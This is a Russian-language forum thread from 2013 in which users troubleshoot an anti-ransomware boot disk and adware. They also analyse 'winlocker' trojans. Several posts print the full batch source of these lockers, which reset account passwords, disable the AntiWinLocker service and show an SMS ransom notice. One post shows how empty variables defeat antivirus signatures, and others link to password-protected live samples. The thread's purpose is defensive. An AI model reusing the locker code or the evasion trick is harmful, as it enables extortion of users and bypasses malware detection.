andryz80
И что.....?
это так баннеры убирают?
MBTY
http://www.comss.info/page.php?al=TrojanZ
Отредактировано g0dl1ke (11.04.2013 21:15:19)
g0dl1ke
Сообщение : Ошибка (#950)
Возникла ошибка, возможно, неверный адрес?
http://www.comss.info/page.php?al=TrojanZekos
Правильная ссылка такая ?
Отредактировано 0 0 (12.04.2013 09:39:14)
0 0
может сюда пойдем?
https://forum.simplix.info/viewtopic.php?pid=15560
0 0 Здравствуйте. Попробовал загрузить образ диска с отключонным НОДом: после сканирования = результат тот-же, архив повреждён! Контрольные суммы МД5, совпадают. Скачал CDBurnerXP 4.5.1.3886.exe, попробовал создать ИСО, включил режим проверки записи диска, в режиме проверки, прогрмма зависла. Пришлось комп. выключать кнопкой. Воспользовавшись ссылкой Update[iso].exe на компе запустился плеер Медиа центр и создать образ у меня не получилось. При повторной попытке открыть Update[iso].exe, всплывает окно с предупреждением об ограничении использования программы,обращайтесь к Администратору.
swf57., раз контрольные суммы верные - то скачен правильно.
С записанного образа пробовали грузится?
Чем не устраивает загрузочная флешка?
1. Скачиваете https://antisms.com/AntiSMSusb.exe
2. Скачиваете https://antisms.com/AntiSMS.iso
; Оба файла должны лежать в одной папке.
3. Вставляете флешку.
; Внимание! Все данные на флешке будут уничтожены, так что если они важны - делайте копии.
4. Запускаете AntiSMSusb и нажимаете Старт
5. Дожидаетесь сообщения "Теперь всё готово!"
; Теперь можете загружаться с флешки.
Отредактировано 0 0 (12.04.2013 19:04:30)
g0dl1ke Спасибо!
Trojan.Hosts паролит существующую учетку http://rghost.ru/45159385 Пароль: infected
привет всем. вот, уже второй раз, наткнулся на новенький троянчег. в первый раз, когда подцепил, пришлось винду новую поставить, не мог разобраться. смотрел файл hosts, а он чистый. сейчас виросописатели поступают умнее. просто блокировать уже смысла нет. троян сидит в памяти и не даёт входить на популярные соц сети, такие как вконтакте, маил, фэйсбук. пишет, что якобы с вашего аккаунта замечен спам, потом просит ввести номер телефона, на который приходит код активации. код разумеется не с официальных сайтов соц сетей, а с короткого номера, предположительно после того как активируешь, несколько сотен рэ улетит в карман нехорошим людям.
Выявил его я только AntiWinLockerCD Pro(спасибо Брызгалову Сергею). Его активность: после запуска трояна, он создаёт 2 файла и прописывается в автозагрузку и добавляется в планировщик по пути C:\Documents and Settings\All Users\Application Data\Mozilla (у меня Windows XP)
забрать и попробовать на виртуалке можно отсюда: http://rghost.ru/45236801
Отредактировано jimq (12.04.2013 18:32:11)
olzaruta сообщает:
Trojan.Hosts паролит существующую учетку http://rghost.ru/45159385 Пароль: infected
@shift @echo off net user %username% "00001" RUNDLL32.exe USER32.dll,LockWorkStation
Ай какой страшный))) И сие обёрнуто этим - Quick Batch File Compiler
0 0 Да, не однократно пробовал загрузится, итог: Loading Mini Windows PE. Windows could not start due to an error while booting from a RAMDISK. Windows failed to open the RAMDICK image. File\BOOT\WINPE.IS_could not be Loaded. The error code is 7. Setup cannot continue. Press any key to exit. Я понял так,- что получил отказ на старт, система отказала продолжить запуск, из-за установки ключа на выход. Что за ключ? Вкладка на форуме, по флешке, не раскрывается?
swf57., "вкладка" не открывается - потому что запрещён JavaScript в браузере. Убрал спойлер.
Касаемо "The error code is 7.": возможно что-то с оперативкой (неисправна или мало её), ну или в биосе настройки не те.
Отпишитесь о конфигурации компьютера. Сколько оперативной памяти, какая Windows ?
Отредактировано 0 0 (12.04.2013 19:11:22)
0 0 Сейчас вкладка раскрылась; скачал оба файла, создал новую папку, скопировал оба файла в папку, сосдал образ на флешку. Сканирую флешку НОДом ,- 2 файла - Архив повреждён, файлы не могут быть извлечены? Сейчас попробую загрузится с флешки снова? ОС - Windows 7 Макс. ; Tип - x86-based PC ; BIOS 14.04.2010 ; RAM - доступно физич. 799Мб, виртуаль. 1.97Гб, подкачки 1.91Гб.
Отредактировано swf57. (12.04.2013 19:49:43)
swf57. сообщает:
Сканирую флешку НОДом
Зачем? Вам чтоб ехало или лампочки мигали?
С флешки грузится?
0 0 С флешки загрузился. Появился рабочий стол. Запустил АНТИСМС, теперь буду разбиратся,что к чему. Вобщем, вопрос решон, загрузочная флешка создана. СПАСИБО!!!
Вот, что то типо вируса AntiWinLocker не справляется.
http://rghost.ru/45300476
@shift @echo off cd %ProgramFiles%\AntiWinLocker ren ServiceAntiWinLocker.exe ServiceAntiWinLocker1.exe cd %ProgramFiles(x86)%\AntiWinLocker ren ServiceAntiWinLocker.exe ServiceAntiWinLocker1.exe cd %ProgramW6432%\AntiWinLocker ren ServiceAntiWinLocker.exe ServiceAntiWinLocker1.exe net stop AntiWinLocker net stop AntiWinLocker reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /f /v "legalnoticecaption" /t REG_SZ /d "Внимание!" reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /f /v "legalnoticetext" /t REG_SZ /d "Компьютер заблокирован !!! В связи с несанкционированным доступом к ресурсам содержащим элементы порнографии и пидофилии. Для разблокировка компьютера отправте SMS на номер 5565 с текстом Unlock . В ответ на SMS, придет сообщение с паролем для разблокировки компьютера!" reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "LegalNoticeCaption" /t REG_SZ /d "Внимание!" reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "LegalNoticeText" /t REG_SZ /d "Компьютер заблокирован !!! В связи с несанкционированным доступом к ресурсам содержащим элементы порнографии и пидофилии. Для разблокировка компьютера отправте SMS на номер 5565 с текстом Unlock . В ответ на SMS, придет сообщение с паролем для разблокировки компьютера!" net user %username% "Julia_HuliYa" net user Администратор "Julia_HuliYa" RUNDLL32.exe USER32.dll,LockWorkStation
краткое описание:
1. запускаем полученный где та файл
2. винда блокируется и требует ввода пароля (который естественно мы не знаем)
3. при перезагрузке выводится страшное сообщение о том, что комп блокирован и бла бла бла
хронологию можно посмотреть тут:
Скрытый текст (раскрыть):
Отредактировано g0dl1ke (15.04.2013 09:43:12)
g0dl1ke
- Точно такой же вирус я выкладывал ..чуть ранее https://forum.simplix.info/viewtopic.ph … 619#p15619
@shift
@echo off
net user %username% "00001"
RUNDLL32.exe USER32.dll,LockWorkStation
Пароль на вход 00001
- Здесь в принципе то же самое..правда добавилось сообщение об отправке смс
- Пароль на вход Julia_HuliYa ,но есть одна особенность, здесь нужно вводить пароль с
учетом переключения на заглавные буквы и обязательно пробел с подчеркиванием.
- Вирус подвергнет в шок простого пользователя, и думаю смс будет отправлена
- Жаль.... AntiSMS не справилась с таким видом вымогательства!
ps Метод избавления от этого очень прост:
- вводим запрашиваемый пароль,
- входим в систему
- затем в учетной записи делаем изменения: или меняем пароль или вообще его не ставим
Отредактировано olzaruta (15.04.2013 17:53:10)
Кстати, хоть и примитив, но введет в замешательство полуопытного пользователя, который уже успешно удалял винлоки через командную строку Безопасного режима или с помощью AntiSMS.
Как вариант: добавить возможность сбрасывать пароли на учетные записи Windows.
А если пофантазировать: новый подобный винлок будет при установке пароля на учетки также шифровать файлы с помощью стандартного средства Windows (cipher). Тогда примитив станет довольно опасным шифровальщиком при установке сложного пароля.
И еще, мало какая проактивка антивируса среагирует на действия этого трояна.
А сигнатурное детектирование? Ведь, чтобы создать новое непалещееся тело достаточно bat файл разбавить пустыми переменными, вроде %dsfhjfshjshfsk%
Данный bat файл DrWeb определил как "Trojan.Winlock.8310", я всего лишь вторую строку разбавил одной пустой переменной:
@ec%fdgdhgds%ho off
И этот антивирус уже не определил зловреда. Т.е. такие винлоки можно создавать с новой неопределяемой сигнатурой сотнями штук в секунду.
Отредактировано art9 (15.04.2013 21:27:15)
0 0 Здравствуйте. Это снова я. Интересная вещь получилась с AntiSMS.iso. После создания загрузочной флешки, я три раза запускался с флешки, всё было ОК. Через день, запускаюсь,- идёт загрузка, затем внизу экрана штрих код и комп. запускается в обычном режиме. После не однократных попыток, решил создать СД диск \который раньше создавался с ошибкой\ из папки загружаю диск, создаётся без ошибки !! Загружаюсь с диска: загрузка, штрих код, ВИНДОС, загрузка, штрх код,ВИНДОС........... Отключаю СД. Загружаюсь с флешки: Вспыхивает на мгновение КРАСНИЙ экран,\ Только и успел увидеть, Режм БИОС \ комп. выключился. Запускаю комп. в Обычном режиме, всё ОК. Загружаюсь СД диска, то-же самое, что было описано выше. С флешки, сначала загрузка затем Обычный режим. Запускаю Антивирусы: DrWeb.cureit.exe: Advanced System Care Uitimate: AVZ4 = вирусов нет. Сегодня попробовал загрузится с флешки и диска,- с обеих загружается, всё ОК. Вот поэтому и решил сообщить на форум. Что это могло быть?
Симпликс здравствуйте. А намечается сделать АнтиСМС на Win Pe 4?
Павел
берешь любой win pe и запускаешь заранее скопированный antisms.exe (рядом ложишь файлы Hashes.bin и SysFiles.bin)
Приветствую Автора и всех знающих людей. Видимо не по теме пост, прошу прощения заранее, но возможно кто-то сможет помочь. Итак.
Всплывающее окно в браузерах
Возникла задачка, сам никак не осилю. У знакомого вот уже пару недель в браузерах по левому краю вертикально появляется полоска с рекламой сомнительного содержания, шириной сантиметров 5. Полоска ничего не блокирует и легко закрывается щелчком по крестику и слову "Закрыть". Снова появляется только при обновлении страницы или на новых вкладках. К какому-либо сайту не привязана, появляется после загрузки страницы и паузы в минуту-другую. В разных браузерах. Сделал полную проверку антивирусом со свежими базами (DrWeb v8), прогнал Malwarebytes, руками проверил ветки автозагрузки в реестре (какие знаю). Почистил руками все временные папки, кэши браузеров, обновил браузеры до актуального состояния, установил Ad Block Plus (последнее привело к тому, что окно теперь появляется в свёрнутом состоянии - конечно уже не так раздражает, но... хочется радикально решить проблему), прогнал avz с актуальными базами, вот его отчёт: http://rlu.ru/qUs
Впервые встал в тупик, не знаю куда копать. Я сначала думал, что это только в Опере. Был случай, когда в её папку
закидывались файлы настроек от старых версий (opera6) и ни какая переустановка браузера не помогала, но тут зараза и в IE и в Мозилле появляется.
По отчёту могу сказать, что у меня сначала вызвал подозрение hfs.exe в автозагрузке, но это оказалась какая-то их нужная программа, стоит у них "официально" в Программ файлс уже пару лет, не прячется, и ни чему никогда не мешала, deskpan.dll - файл сборки винды, стоит везде где она установлена, rpshell.dll - кусок Реал Плеера (стоял в расширениях и дополнениях к браузерам), обновил его вместе с остальными, не похоже на него, sptd - это "знакомец" - драйвер виртуального привода от Даймонд Тулс, тоже думаю не при делах. Хост сразу посмотрел ничего не нашёл, на всякий случай почистил, не помогло. На файлы от NV (видеодрайвер) тоже грешить трудно, вроде частенько присутствуют.
Случай не для АнтиСМС, конечно, хочу попробовать антируткит прогнать (http://rlu.ru/qVv) жаль только что клиент живёт далеко, теперь к нему попаду только через недельку. Буду бороться дальше, если какие-то мысли будут, то здорово.
ЗЫ А вот на днях у другого приятеля абсолютно такой же случай: http://rlu.ru/rbz
В архиве снова отчёт avz и скрин заразы в IE. И опять ничего найти не могу...
viprus
это xp sp2? Если так, то нужно установить sp3.
затем:
" Рекламные посторонние баннеры в браузерах - для решения этой проблемы выполните следущие действия:
1) деинсталлируете программы, которые содержат слово "webalta";
2) проверьте компьютер бесплатным антивирусным сканером, затем запустите утилиту AntiDust, потом проверьте компьютер с помощью AdwCleaner (by Xplode);
3) почистите кэш и куки в браузерах, кэш DNS, например, с помощью программы ccleaner;
4) проверьте настройки роутера на наличие чужих DNS;
5) с помошью программы Hijackthis проверьте наличие чужих DNS (секция О17), если найдете в данной секции чужие DNS, то пофиксите их ("Fix checked").
Как определить чужой DNS или нет: проверьте его IP на сайте 2ip.ru - если окажется, что он другой страны, то скорее всего, что он зловредный.
Если после очистки DNS пропадет доступ в интернет, то следует открыть свойства сетевого адаптера и прописать туда DNS выданный провайдером или Google DNS 8.8.8.8 в крайнем случае."
viprus сообщает:
Случай не для АнтиСМС, конечно
Из всего этого не понятно, запускали вы AntiSMS или нет. У меня встречался такой баннер и программа его лечила.